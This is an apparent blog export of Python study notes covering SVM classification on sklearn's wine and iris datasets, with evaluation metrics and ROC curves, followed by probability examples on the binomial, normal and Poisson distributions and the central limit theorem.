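Two attributes of the fitted search object that are often useful afterwards; a small usage sketch:

# The grid search refits the best configuration on the full data (refit=True
# by default), so the tuned model can be used immediately:
best_model = model_grid.best_estimator_
print(best_model.predict(X[:5]))

# The per-configuration cross-validation results live in cv_results_:
print(model_grid.cv_results_['mean_test_score'])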

10.8 Worked Example: Building a Classification Model with SVM

Preparation: import the required modules

import numpy as np
from sklearn import svm
from sklearn.svm import SVC  # import the SVM model
from sklearn.model_selection import train_test_split  # train/test splitting
from sklearn.datasets import load_wine  # the wine dataset
from time import time

(1) Load the dataset

The data must be converted into the format SVM expects: [class label] [feature 1]:[feature value] [feature 2]:[feature value] …

sklearn ships with the classic wine dataset, loaded via load_wine()

wine dataset: https://scikit-learn.org/stable/modules/generated/sklearn.datasets.load_wine.html

| Attribute | Value |
| --- | --- |
| Classes | 3 |
| Samples per class | [59, 71, 48] |
| Total samples | 178 |
| Dimensionality | 13 |
    wine = load_wine()
    wine_data = wine.data
    wine_label = wine.target
    wine_data, wine_label
(array([[1.423e+01, 1.710e+00, 2.430e+00, ..., 1.040e+00, 3.920e+00, 1.065e+03],
        [1.320e+01, 1.780e+00, 2.140e+00, ..., 1.050e+00, 3.400e+00, 1.050e+03],
        [1.316e+01, 2.360e+00, 2.670e+00, ..., 1.030e+00, 3.170e+00, 1.185e+03],
        ...,
        [1.327e+01, 4.280e+00, 2.260e+00, ..., 5.900e-01, 1.560e+00, 8.350e+02],
        [1.317e+01, 2.590e+00, 2.370e+00, ..., 6.000e-01, 1.620e+00, 8.400e+02],
        [1.413e+01, 4.100e+00, 2.740e+00, ..., 6.100e-01, 1.600e+00, 5.600e+02]]),
 array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1,
        1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
        1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
        1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2,
        2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
        2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
        2, 2]))

(2) Data preprocessing

Standardize the data with the preprocessing class StandardScaler, to avoid serious scale (unit) inconsistencies between features

Standardization (normalization) rescales data proportionally so that it falls into a small, specified range. It is widely used when comparing and weighting indicators: it removes the units, turning values into dimensionless pure numbers so that indicators with different units or magnitudes can be compared and weighted. A minimal sketch of what StandardScaler computes appears below, followed by the actual preprocessing step.
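A minimal sketch, assuming a small toy matrix: StandardScaler transforms each column to (value - column mean) / column standard deviation.

import numpy as np
from sklearn.preprocessing import StandardScaler

A = np.array([[1.0, 10.0], [2.0, 20.0], [3.0, 30.0]])
scaled = StandardScaler().fit_transform(A)
manual = (A - A.mean(axis=0)) / A.std(axis=0)  # same column-wise formula
print(np.allclose(scaled, manual))  # True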

from sklearn.preprocessing import StandardScaler

wine_data = StandardScaler().fit_transform(wine_data)  # standardize the data
wine_data

array([[ 1.51861254, -0.5622498 ,  0.23205254, ...,  0.36217728,  1.84791957,  1.01300893],
       [ 0.24628963, -0.49941338, -0.82799632, ...,  0.40605066,  1.1134493 ,  0.96524152],
       [ 0.19687903,  0.02123125,  1.10933436, ...,  0.31830389,  0.78858745,  1.39514818],
       ...,
       [ 0.33275817,  1.74474449, -0.38935541, ..., -1.61212515, -1.48544548,  0.28057537],
       [ 0.20923168,  0.22769377,  0.01273209, ..., -1.56825176, -1.40069891,  0.29649784],
       [ 1.39508604,  1.58316512,  1.36520822, ..., -1.52437837, -1.42894777, -0.59516041]])

(3) Splitting the data

Split the data into a training set and a test set, with training : test = 80% : 20%

Reference: a thorough explanation of the parameters of sklearn's train_test_split()

wine_train, wine_test, wine_train_label, wine_test_label = \
    train_test_split(wine_data, wine_label, test_size=0.2, random_state=100)

(4) Train on the training set with the default SVM parameters to produce a model (using the default rbf kernel)

    time0 = time()
    model = SVC()
    model.fit(wine_train, wine_train_label)
    time1 = time()

(5) Results and analysis

def result_show_analyse(test, test_label):
    """
    Predict on the test set and analyse the results.
    """
    # 1. Prediction results
    print("--------- Test-set results --------")
    test_pred = model.predict(test)
    print("True test-set labels:\n", test_label)
    print("Predicted test-set labels:\n", test_pred)
    # Count the predictions that match the truth
    true = np.sum(test_pred == test_label)
    print("Number of correct predictions:", true)
    print("Number of wrong predictions:", test_label.shape[0] - true)
    print("Training time: %.6f s" % (time1 - time0))
    # 2. Analysis: accuracy, precision, recall, F1 score, Cohen's kappa
    print("--------- Test-set analysis --------")
    print("Accuracy of the SVM on the wine data: %f"
          % (accuracy_score(test_label, test_pred)))
    print("Precision of the SVM on the wine data: %f"
          % (precision_score(test_label, test_pred, average="macro")))
    # multi-class metrics need average="macro"
    print("Recall of the SVM on the wine data: %f"
          % (recall_score(test_label, test_pred, average="macro")))
    print("F1 score of the SVM on the wine data: %f"
          % (f1_score(test_label, test_pred, average="macro")))
    print("Cohen's kappa of the SVM on the wine data: %f"
          % (cohen_kappa_score(test_label, test_pred)))
    print("Classification report for the SVM on the wine data:\n",
          classification_report(test_label, test_pred))
    # 3. Plot predicted vs. true labels
    print("--------- Test-set result plot --------")
    plt.plot(test_pred, 'bo', label="predicted")
    plt.plot(test_label, 'r*', label="true")
    plt.xlabel('test samples', color='r', fontsize=18)
    plt.ylabel('class label', color='r', fontsize=18, rotation=360)
    plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
    plt.title('True vs. predicted classes on the test set', fontsize=18)
    plt.show()


# Call the result function
# Import the relevant libraries
from sklearn.metrics import accuracy_score, precision_score, \
    recall_score, f1_score, cohen_kappa_score
from sklearn.metrics import classification_report
import matplotlib.pyplot as plt
import matplotlib as mpl

# Font setup for the plots
mpl.rcParams['font.sans-serif'] = ['SimHei']
mpl.rcParams['axes.unicode_minus'] = False
result_show_analyse(wine_test, wine_test_label)  # run the analysis

--------- Test-set results --------
True test-set labels:
 [1 2 0 1 2 2 1 1 1 1 2 1 2 2 2 0 2 0 1 0 2 0 1 1 0 0 1 1 1 2 2 1 0 1 2 2]
Predicted test-set labels:
 [1 2 0 1 1 2 1 1 1 1 2 1 2 2 2 0 2 0 1 0 2 0 1 1 0 0 1 1 1 2 2 1 0 1 2 2]
Number of correct predictions: 35
Number of wrong predictions: 1
Training time: 0.003162 s
--------- Test-set analysis --------
Accuracy of the SVM on the wine data: 0.972222
Precision of the SVM on the wine data: 0.979167
Recall of the SVM on the wine data: 0.974359
F1 score of the SVM on the wine data: 0.975914
Cohen's kappa of the SVM on the wine data: 0.956938
Classification report for the SVM on the wine data:
               precision    recall  f1-score   support

           0       1.00      1.00      1.00         8
           1       0.94      1.00      0.97        15
           2       1.00      0.92      0.96        13

    accuracy                           0.97        36
   macro avg       0.98      0.97      0.98        36
weighted avg       0.97      0.97      0.97        36
--------- Test-set result plot --------

(Figure: true vs. predicted class labels for each test sample)

[Sklearn] evaluation methods in sklearn.metrics

By convention the class of interest is the positive class and the remaining classes are negative. On the test set each prediction is either correct or incorrect. The total counts of the 4 possible situations are denoted:

| Name | Meaning |
| --- | --- |
| tp (true positive) | positive class predicted as positive |
| fn (false negative) | positive class predicted as negative |
| fp (false positive) | negative class predicted as positive |
| tn (true negative) | negative class predicted as negative |

Confusion matrix for class 0:

| | predicted class 0 | predicted not class 0 |
| --- | --- | --- |
| actually class 0 | tp = 8 | fn = 0 |
| actually not class 0 | fp = 0 | tn = 28 |

| precision | recall | f1-score |
| --- | --- | --- |
| $P=\frac{tp}{tp+fp}=1$ | $R=\frac{tp}{tp+fn}=1$ | $\frac{2PR}{P+R}=1$ |

Confusion matrix for class 1:

| | predicted class 1 | predicted not class 1 |
| --- | --- | --- |
| actually class 1 | tp = 15 | fn = 0 |
| actually not class 1 | fp = 1 | tn = 20 |

| precision | recall | f1-score |
| --- | --- | --- |
| $P=\frac{tp}{tp+fp}=\frac{15}{16}=0.9375$ | $R=\frac{tp}{tp+fn}=1$ | $\frac{2PR}{P+R}=\frac{30}{31}=0.9677$ |

Confusion matrix for class 2:

| | predicted class 2 | predicted not class 2 |
| --- | --- | --- |
| actually class 2 | tp = 12 | fn = 1 |
| actually not class 2 | fp = 0 | tn = 23 |

| precision | recall | f1-score |
| --- | --- | --- |
| $P=\frac{tp}{tp+fp}=1$ | $R=\frac{tp}{tp+fn}=\frac{12}{13}=0.923$ | $\frac{2PR}{P+R}=\frac{24}{25}=0.96$ |
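These per-class values can be reproduced directly from the 3x3 confusion matrix reported in step (6) below; a small numpy sketch:

import numpy as np

# Confusion matrix from step (6): rows = true class, columns = predicted class
C = np.array([[8, 0, 0],
              [0, 15, 0],
              [0, 1, 12]])

for k in range(3):
    tp = C[k, k]
    fn = C[k].sum() - tp          # true class k, predicted as something else
    fp = C[:, k].sum() - tp       # predicted class k, actually something else
    P = tp / (tp + fp)
    R = tp / (tp + fn)
    print(k, P, R, 2 * P * R / (P + R))
# class 0: P=1.0,    R=1.0,    F1=1.0
# class 1: P=0.9375, R=1.0,    F1=0.9677...
# class 2: P=1.0,    R=0.923., F1=0.96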

(6) Confusion matrix of the classification results, with a chart

from sklearn import metrics


def cm_plot(y, yp):
    conf_mx = metrics.confusion_matrix(y, yp)  # confusion matrix on the test set
    print("Confusion matrix of the test set:\n", conf_mx)
    # Plot the confusion matrix; the book uses cm.Greens, Oranges is used here
    # instead (https://blog.csdn.net/weixin_51111267/article/details/122605388)
    plt.matshow(conf_mx, cmap=plt.cm.Oranges)
    plt.colorbar()  # color scale
    # Annotate each cell: row r = true label (plot y), column c = predicted label (plot x)
    for r in range(len(conf_mx)):
        for c in range(len(conf_mx)):
            plt.annotate(conf_mx[r, c], xy=(c, r), horizontalalignment='center',
                         verticalalignment='center')
    plt.ylabel('True label')       # axis labels
    plt.xlabel('Predicted label')
    return plt


wine_test_pred = model.predict(wine_test)
cm_plot(wine_test_label, wine_test_pred).show()

Confusion matrix of the test set:
 [[ 8  0  0]
 [ 0 15  0]
 [ 0  1 12]]

(Figure: confusion matrix heat map)

10.9 Expert Tips

10.9.1 The SMO Algorithm

The optimization algorithm behind SVM training; it trades a little precision for speed

SMO = Sequential Minimal Optimization

10.9.3 Choosing the Kernel Function

For the Gaussian RBF kernel, gamma can be tuned by computing the accuracy and plotting a validation curve over gamma values

# Accuracy for different gamma values
score = []
gamma_range = np.logspace(-10, 1, 50)  # gamma values evenly spaced on a log scale
for i in gamma_range:
    model = SVC(kernel="rbf", gamma=i, cache_size=5000)
    model.fit(wine_train, wine_train_label)
    score_gamma = model.score(wine_test, wine_test_label)
    score.append(score_gamma)
print("Highest accuracy:", max(score))
print("Corresponding gamma value:", gamma_range[score.index(max(score))])
plt.xlabel("gamma")
plt.ylabel("accuracy")
plt.title("validation curve over gamma")
plt.plot(gamma_range, score)
plt.show()

Highest accuracy: 1.0
Corresponding gamma value: 0.020235896477251554

(Figure: test accuracy as a function of gamma)

10.9.4 Plotting Multi-class ROC Curves

[Machine learning even a primary-school student can follow] one video summarizing the confusion matrix, recall, precision, ROC, etc.

How ROC curves are constructed, and how to draw them in SPSS

The closer the ROC curve is to the top-left corner, the better the model performs

from itertools import cycle
from sklearn.metrics import roc_curve, auc
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import label_binarize
from numpy import interp


def plot_roc(test, test_label, test_pred):
    """
    :param test: test-sample features
    :param test_label: test-sample labels
    :param test_pred: test-sample predictions
    """
    class_num = len(np.unique(test_label))  # number of classes
    Y_pred = test_pred
    # Binarize the outputs
    # Y_label: true labels, Y_pred: labels predicted by the learner
    Y_label = label_binarize(test_label, classes=[i for i in range(class_num)])
    Y_pred = label_binarize(Y_pred, classes=[i for i in range(class_num)])
    # Compute the ROC curve for each class
    fpr = dict()      # false positive rate (FPR)
    tpr = dict()      # true positive rate (TPR)
    roc_auc = dict()  # area under the ROC curve
    for i in range(class_num):
        fpr[i], tpr[i], _ = roc_curve(Y_label[:, i], Y_pred[:, i])
        roc_auc[i] = auc(fpr[i], tpr[i])
    # Compute the micro-average ROC curve and its area
    fpr["micro"], tpr["micro"], _ = roc_curve(Y_label.ravel(), Y_pred.ravel())
    roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])

    # Compute the macro-average ROC curve and its area
    # Step 1: aggregate all false positive rates
    all_fpr = np.unique(np.concatenate([fpr[i] for i in range(class_num)]))

    # Step 2: interpolate all ROC curves at these points
    mean_tpr = np.zeros_like(all_fpr)
    for i in range(class_num):
        mean_tpr += interp(all_fpr, fpr[i], tpr[i])
    # Step 3: average and compute the AUC
    mean_tpr /= class_num
    fpr["macro"] = all_fpr
    tpr["macro"] = mean_tpr
    roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
    # Plot the ROC curve of one specific class, e.g. class 1
    plt.figure()
    lw = 2
    plt.plot(fpr[1], tpr[1], color="darkorange",
             lw=lw, label="ROC curve (area = %0.2f)" % roc_auc[1])
    plt.plot([0, 1], [0, 1], color="navy", lw=lw, linestyle="--")
    plt.xlim([0.0, 1.0])
    plt.ylim([0.0, 1.05])
    plt.xlabel("False Positive Rate (FPR)")
    plt.ylabel("True Positive Rate (TPR)")
    plt.title("Receiver operating characteristic example")
    plt.legend(loc="lower right")
    plt.show()

    # Plot the ROC curves of all classes
    lw = 2  # line width
    plt.figure()
    plt.plot(fpr["micro"], tpr["micro"],
             label="micro-average ROC curve (area = {0:0.2f})"
                   "".format(roc_auc["micro"]),
             color="deeppink", linestyle=":", linewidth=4)

    plt.plot(fpr["macro"], tpr["macro"],
             label="macro-average ROC curve (area = {0:0.2f})"
                   "".format(roc_auc["macro"]),
             color="navy", linestyle=":", linewidth=4)
    colors = cycle(["aqua", "darkorange", "cornflowerblue"])
    for i, color in zip(range(class_num), colors):
        plt.plot(fpr[i], tpr[i], color=color, lw=lw,
                 label="ROC curve of class {0} (area = {1:0.2f})"
                       "".format(i, roc_auc[i]))

    plt.plot([0, 1], [0, 1], "k--", lw=lw)
    plt.xlim([0.0, 1.0])
    plt.ylim([0.0, 1.05])
    plt.xlabel("False Positive Rate (FPR)")
    plt.ylabel("True Positive Rate (TPR)")
    plt.title('Some extension of Receiver operating characteristic '
              'to multi-class')
    plt.legend(loc="lower right")
    plt.show()


# Call the ROC-plotting function
model = SVC()  # instantiate with default parameters
model.fit(wine_train, wine_train_label)
wine_test_pred = model.predict(wine_test)
plot_roc(wine_test, wine_test_label, wine_test_pred)

(Figure: ROC curve of class 1)

(Figure: micro/macro-average and per-class ROC curves)
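Because the curves above are built from hard 0/1 predictions, each one has a single bend. A smoother, more informative ROC comes from continuous scores. A small sketch, reusing the imports above; with decision_function_shape='ovr' (the SVC default) decision_function returns one column of scores per class:

model_s = SVC(decision_function_shape='ovr')
model_s.fit(wine_train, wine_train_label)
scores = model_s.decision_function(wine_test)   # shape (n_samples, 3)

Y_label = label_binarize(wine_test_label, classes=[0, 1, 2])
fpr0, tpr0, _ = roc_curve(Y_label[:, 0], scores[:, 0])
print(auc(fpr0, tpr0))  # AUC for class 0 computed from real-valued scores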

10.10 Exercise: Build an SVM Classifier on the iris Dataset

https://scikit-learn.org/stable/modules/generated/sklearn.datasets.load_iris.html

import numpy as np
from sklearn import svm
from sklearn.svm import SVC
from sklearn.model_selection import train_test_split
from sklearn.datasets import load_iris
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import classification_report
import matplotlib.pyplot as plt
import matplotlib as mpl
from time import time

# (1) Load the dataset and separate features and labels
iris = load_iris()
iris_data = iris.data
iris_label = iris.target
# (2) Standardize the dataset
iris_data = StandardScaler().fit_transform(iris_data)
# (3) Split the dataset into a training set and a test set
iris_train, iris_test, iris_train_label, iris_test_label = \
    train_test_split(iris_data, iris_label, test_size=0.2)
# (4) Build the SVM model
model = SVC()
model.fit(iris_train, iris_train_label)
iris_test_pred = model.predict(iris_test)
# (5) Report the predictions, evaluate the classifier, and print the report
print(classification_report(iris_test_label, iris_test_pred))
mpl.rcParams['font.sans-serif'] = ['SimHei']
mpl.rcParams['axes.unicode_minus'] = False
print("--------- Test-set result plot --------")
plt.plot(iris_test_pred, 'bo', label="predicted")
plt.plot(iris_test_label, 'r*', label="true")
plt.xlabel('test samples', color='r', fontsize=18)
plt.ylabel('class label', color='r', fontsize=18, rotation=360)
plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
plt.title('True vs. predicted classes on the test set', fontsize=18)
plt.show()

              precision    recall  f1-score   support

           0       1.00      1.00      1.00         9
           1       0.92      0.92      0.92        13
           2       0.88      0.88      0.88         8

    accuracy                           0.93        30
   macro avg       0.93      0.93      0.93        30
weighted avg       0.93      0.93      0.93        30
--------- Test-set result plot --------

(Figure: true vs. predicted class labels for each iris test sample)

    ]]>
@@ -10104,7 +10104,7 @@ /posts/Python-%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%80(7-9)/ - Main text

7 Describing Statistical Laws 1: Foundations of Probability Theory

7.1.3 Probability and Frequency

Example 7.3 Coin tossing

Toss a coin 10 times and count the number of heads. Write a Python program to observe the relationship between the empirical frequency of the event and its probability as the number of tosses grows.

import random


def coin_trial():
    """
    Simulate 10 coin tosses.
    """
    heads = 0  # number of heads
    for i in range(10):
        if random.random() <= 0.5:
            heads += 1
    return heads


def simulate(n):
    """
    Simulate 10 * n coin tosses and return the mean number of heads per trial.
    """
    trials = []
    for i in range(n):
        trials.append(coin_trial())
    return sum(trials) / n


simulate(1)       # 6.0
simulate(10)      # 4.5
simulate(100)     # 4.92
simulate(1000)    # 5.053
simulate(10000)   # 5.0029
simulate(100000)  # 5.01412

7.4.1 Discrete Random Variables

Example 7.13 Finding the probability mass function and the distribution function

A product made by some company wins a prize with probability 50%. Find the probability mass function and the distribution function of the number of winning items among 4 purchased products (a Bernoulli trial).

Buying 4 identical products is a sequence of n independent Bernoulli trials. Let the random variable X be the number of winning items, p the probability of winning and q of not winning; then $P _ {n}(X = k) = C^{k} _ {n}p^k q^{n-k}$, with $p = \frac{1}{2}$, $q = \frac{1}{2}$

| X | 0 | 1 | 2 | 3 | 4 |
| --- | --- | --- | --- | --- | --- |
| $p _ {k}$ | $\frac{1}{16}$ | $\frac{1}{4}$ | $\frac{3}{8}$ | $\frac{1}{4}$ | $\frac{1}{16}$ |

The distribution function is as follows (a one-line scipy check appears after the list)

$F(0) = P(X = 0) = \frac{1}{16}$

$F(1) = P(X = 0) + P(X = 1) = \frac{5}{16}$

$F(2) = P(X = 0) + P(X = 1) + P(X = 2) = \frac{11}{16}$

$F(3) = P(X = 0) + P(X = 1) + P(X = 2) + P(X = 3) = \frac{15}{16}$

$F(4) = P(X = 0) + P(X = 1) + P(X = 2) + P(X = 3) + P(X = 4) = 1$
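A one-line check with scipy.stats: the pmf and cdf of Binomial(n=4, p=0.5) reproduce the table and F(k) above.

from scipy import stats

print(stats.binom.pmf(range(5), 4, 0.5))  # [0.0625 0.25 0.375 0.25 0.0625]
print(stats.binom.cdf(range(5), 4, 0.5))  # [0.0625 0.3125 0.6875 0.9375 1.]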

Example 7.14 Plot the probability mass function and the distribution function of Example 7.13 in Python

import numpy as np
from scipy import stats
import matplotlib.pyplot as plt
from matplotlib.font_manager import FontProperties
from collections import Counter

# rcParams configuration
plt.rcParams["font.sans-serif"] = ["Microsoft YaHei"]
# When True, minus signs use the unicode character instead of a hyphen,
# see http://en.wikipedia.org/wiki/Plus_and_minus_signs#Character_codes
plt.rcParams['axes.unicode_minus'] = False


def Discrete_pmf():
    xk = np.arange(5)  # all possible values of X: [0 1 2 3 4]
    pk = (1 / 16, 1 / 4, 3 / 8, 1 / 4, 1 / 16)  # probability mass function
    # name: instance name 'custm'; values: a tuple of two array-likes (xk, pk),
    # where xk are integers and pk are probabilities in (0, 1] with sum(pk) = 1;
    # xk and pk must have the same shape.
    dist = stats.rv_discrete(name='custm', values=(xk, pk))
    rv = dist.rvs(size=100)  # rvs: draw 100 random numbers from this distribution
    fig, (ax0, ax1) = plt.subplots(ncols=2, figsize=(10, 5))  # split the window into ax0, ax1

    ax0.set_title("Probability mass function")
    ax0.plot(xk, pk, 'ro', ms=8, mec='r')  # red dots of size 8 at (xk, pk)
    ax0.vlines(xk, 0, pk, colors='r', linestyles='-', lw=2)  # red solid stems of width 2
    for i in xk:  # annotate the values
        ax0.text(i, pk[i], '%.3f' % pk[i], ha='center', va='bottom')

    ax1.set_title("Distribution function")
    pk1 = dist.cdf(xk)  # cdf: cumulative distribution function
    # rv: the data sequence whose histogram is drawn (the annotated values come
    # from the exact cdf, so they need not match the sample exactly)
    # 5 bins (0 1 2 3 4)
    # density=True normalizes the histogram to integrate to 1
    # histtype: 'bar', 'barstacked', 'step', 'stepfilled'
    # blue, transparency 0.75, cumulative=True accumulates the frequencies
    ax1.hist(rv, 5, density=True, histtype='step', facecolor='blue',
             alpha=0.75, cumulative=True)  # .hist draws the histogram
    for i in xk:  # annotate the values
        ax1.text(i, pk1[i], '%.3f' % pk1[i], ha='center', va='bottom')
    print(Counter(rv))


if __name__ == "__main__":
    Discrete_pmf()

Counter({1: 30, 3: 30, 2: 28, 4: 7, 0: 5})

(Figure: pmf stem plot and cumulative histogram)

7.4.2 Continuous Random Variables

Example 7.16 The normal distribution

Plot the probability density function ${\color{Red}{f(x)}}$ of the normal distribution and the corresponding distribution function ${\color{Blue}{F(x)}}$ in Python

If a random variable X has the probability density function below, X is called a normal random variable, written $X\sim N(\mu , \sigma ^{2})$

${\color{Red}{f(x)}} = \frac{1}{\sqrt{2\pi}\sigma}e^{-\frac{(x-\mu)^2}{2\sigma ^2}}, -\infty < x < +\infty$

The code below simulates a normal distribution with mean $\mu = 0$ and variance $\sigma ^2 = 1$

import numpy as np
from numpy import pi
import matplotlib.pyplot as plt
import scipy.stats as stats


def test_norm_pmf():
    mu = 0     # mean 0
    sigma = 1  # standard deviation 1
    x = np.arange(-5, 5, 0.1)  # values of the random variable x
    fig, (ax0, ax1) = plt.subplots(ncols=2, figsize=(10, 5))

    # Probability density function
    y0 = (1 / ((np.sqrt(2 * pi) * sigma))) * np.exp(-(((x - mu) ** 2)) / (2 * sigma * sigma))  # f(x)
    ax0.plot(x, y0)
    ax0.set_title('Normal: $\mu$ = %.1f, $\sigma^2$ = %.1f' % (mu, sigma))
    ax0.set_xlabel('x')
    ax0.set_ylabel('Probability density', fontsize=15)

    # Distribution function
    y1 = stats.norm.cdf(x, 0, 1)  # F(x)
    ax1.plot(x, y1)
    ax1.set_title('Normal: $\mu$ = %.1f, $\sigma^2$ = %.1f' % (mu, sigma))
    ax1.set_xlabel('x')
    ax1.set_ylabel('Cumulative density', fontsize=15)

    fig.subplots_adjust(wspace=0.4)
    plt.show()


if __name__ == "__main__":
    test_norm_pmf()

(Figure: standard normal pdf and cdf)

7.8 Expert Tips

Python has a good statistical inference package: stats in Scipy. The module contains random variables for many probability distributions as well as many common statistical functions, including:

| Method | Full name | Notes |
| --- | --- | --- |
| rvs | Random variates of given size | draws random numbers from the given distribution |
| pdf | Probability Density Function | for continuous random variables, $P(a<X\le b)=\int _ {a}^{b} f(x)dx$ |
| pmf | Probability Mass Function | for discrete random variables, i.e. the distribution law $f(x)=P\{X = x _ {k}\}$ |
| cdf | Cumulative Distribution Function | also called the distribution function, $P(X \le x)$ |
| ppf | Percent point function | the inverse of cdf |
| sf | Survival function | |
| stats | | returns the mean and variance (mean(), var()) |

Common distributions

| Name | Meaning |
| --- | --- |
| beta | beta distribution |
| f | F distribution |
| gamma | gamma distribution |
| poisson | Poisson distribution |
| hypergeom | hypergeometric distribution |
| lognorm | log-normal distribution |
| binom | binomial distribution |
| uniform | uniform distribution |
| chi2 | chi-squared distribution |
| cauchy | Cauchy distribution |
| laplace | Laplace distribution |
| rayleigh | Rayleigh distribution |
| t | Student's t distribution |
| norm | normal distribution |
| expon | exponential distribution |
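A small sketch exercising the methods from the table on the standard normal distribution (ppf inverts cdf):

from scipy.stats import norm

print(norm.cdf(1.96))   # ~0.975
print(norm.ppf(0.975))  # ~1.96, the inverse of cdf
print(norm.sf(1.96))    # survival function = 1 - cdf, ~0.025
print(norm.stats())     # (mean, variance) = (0.0, 1.0)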

Example 7.23 Getting the documentation of the norm class

Random functions for the normal distribution

from scipy import stats
from scipy.stats import norm

print(norm.__doc__)

Example 7.24 Creating normal random variables and plotting them

from scipy import stats
from scipy.stats import norm
import numpy as np
import pylab as plt

X = norm()
Y = norm(loc=1.0, scale=2.0)  # normal distribution with mean 1.0 and standard deviation 2.0
t = np.arange(-10, 10, 0.01)
plt.plot(t, X.pdf(t), label='$X$', color="red")
plt.plot(t, Y.pdf(t), "b--", label="$Y$")
plt.legend()
plt.show()

(Figure: pdfs of X ~ N(0, 1) and Y ~ N(1, 4))

7.9 Exercises

(1) The Poisson distribution

Accidents happen at an intersection at an average rate of 2 per day. Write a Python program to compute the probability that 0, 1, 2, 3 or 4 accidents happen there in one day.

$P(X=r)=\frac {e^{-\lambda} \lambda^{r}}{r!}$, where r is the number of events in the given interval and $\lambda$ is the average number of events per interval

| $X _ {i}$ | 0 | 1 | 2 | 3 | 4 |
| --- | --- | --- | --- | --- | --- |
| $P(X=X _ {i})$ | $e^{-2}$ | $2e^{-2}$ | $2e^{-2}$ | $\frac{4}{3}e^{-2}$ | $\frac{2}{3}e^{-2}$ |
import numpy as np
from scipy import stats
import matplotlib.pyplot as plt

# Enable Chinese characters in the plot
plt.rcParams['font.sans-serif'] = ['SimHei']
plt.rcParams['axes.unicode_minus'] = False

# Define the random variable
mu4 = 2  # mean: 2 accidents per day
# Number of accidents: 0, 1, 2, 3 or 4
X4 = np.arange(0, 5, 1)
pList4 = stats.poisson.pmf(X4, mu4)  # pmf of the Poisson distribution
print(pList4)
# Plot
plt.plot(X4, pList4, marker='o', linestyle='None', alpha=0.75)
plt.vlines(X4, 0, pList4, alpha=0.75)
plt.xlabel('number of accidents k at the intersection')
plt.ylabel('probability')
for i in X4:  # annotate the values
    plt.text(i, pList4[i], '%.3f' % pList4[i], ha='center', va='bottom')
plt.title('Poisson distribution: mean mu=%i' % mu4)
plt.show()

[0.13533528 0.27067057 0.27067057 0.18044704 0.09022352]

(Figure: Poisson pmf for mu = 2)

8 Describing Statistical Laws 2: Random Variables and Probability Statistics

• This chapter is where it started to get hard for me: Math II of the postgraduate entrance exam does not cover probability and statistics, and I did not study the subject properly as an undergraduate. It started to click again after a few days re-watching the Sichuan University probability lectures.

• In my opinion the book's ordering is not great here; it follows the textbook's order, and the material overlaps heavily with Chapter 9.

Chebyshev's inequality

$P\{\left | X - \mu \right | \ge \varepsilon \}\le \frac{\sigma^2}{\varepsilon^2} \quad (\forall \varepsilon >0)$

The probability that $X$ falls into the $\varepsilon$-neighborhood $(\mu - \varepsilon,\mu + \varepsilon)$ centered at the mean $\mu$ is at least $1-\frac{\sigma^2}{\varepsilon^2}$
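A quick empirical sketch of the bound; the exponential distribution (with $\mu = \sigma = 1$) and $\varepsilon = 2$ are arbitrary choices:

import numpy as np

rng = np.random.default_rng(1)
x = rng.exponential(scale=1.0, size=100_000)  # Exp(1): mean 1, std 1
eps = 2.0
empirical = np.mean(np.abs(x - 1.0) >= eps)
print(empirical, "<=", 1.0 / eps ** 2)  # ~0.0498 <= 0.25, as Chebyshev guarantees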

8.2 The Law of Large Numbers and the Central Limit Theorem

8.2.1 The Law of Large Numbers

A rigorous proof of the statement "when the same experiment is repeated a large number of times, the final result tends to stabilize around some fixed value."

| Name | Description |
| --- | --- |
| Chebyshev's law of large numbers | independent, not identically distributed: when n is large enough, the arithmetic mean of n independent random variables concentrates tightly around its expectation |
| Khinchin's law of large numbers | independent and identically distributed (a corollary of Chebyshev's law) |
| Bernoulli's law of large numbers | the frequency $\frac{n _ {A}}{n}$ of an event A in n independent repeated trials converges in probability to the probability p of A |

8.2.2 The Central Limit Theorem

Under certain conditions, the arithmetic mean of sufficiently many mutually independent random variables follows a normal distribution, regardless of the distributions of the individual variables.

| Name | Description |
| --- | --- |
| Levy-Lindeberg | independent and identically distributed |
| Lyapunov | independent, not identically distributed |
| de Moivre-Laplace | binomial; a special case of the i.i.d. theorem, showing that the normal distribution is the limiting distribution of the binomial |

Theorem 8.1 The central limit theorem for i.i.d. variables

Partial sum: $S _ {n}=\Sigma ^{n} _ {k=1}X _ {k} \sim N(n\mu, n\sigma ^2)$

Arithmetic mean: $\bar X = \frac {1}{n}\Sigma ^{n} _ {k=1}X _ {k} \sim N(\mu, \frac {\sigma ^2}{n})$

Standardized mean: $Y _ {n} = \frac {\bar{X}-\mu}{\sigma / \sqrt{n}} \sim N(0,1)$

Whatever distribution the {$X _ {k}$} follow, for large n the standardized arithmetic mean $Y _ {n}$ of the first n terms approximately follows the normal distribution N(0,1)

Theorem 8.2 The de Moivre-Laplace theorem

Let $X \sim b(n,p)$. Then for large n

$P\{a < x \le b\}\approx \Phi(\frac{b-np}{\sqrt{np(1-p)}})-\Phi(\frac{a-np}{\sqrt{np(1-p)}})$

• The Poisson distribution was used earlier to approximate the binomial (accurate when $p \le 0.1$); the result above is not restricted by the value of p

• When $n \ge 50$, the normal approximation is already quite accurate, and the larger n is, the better the accuracy.

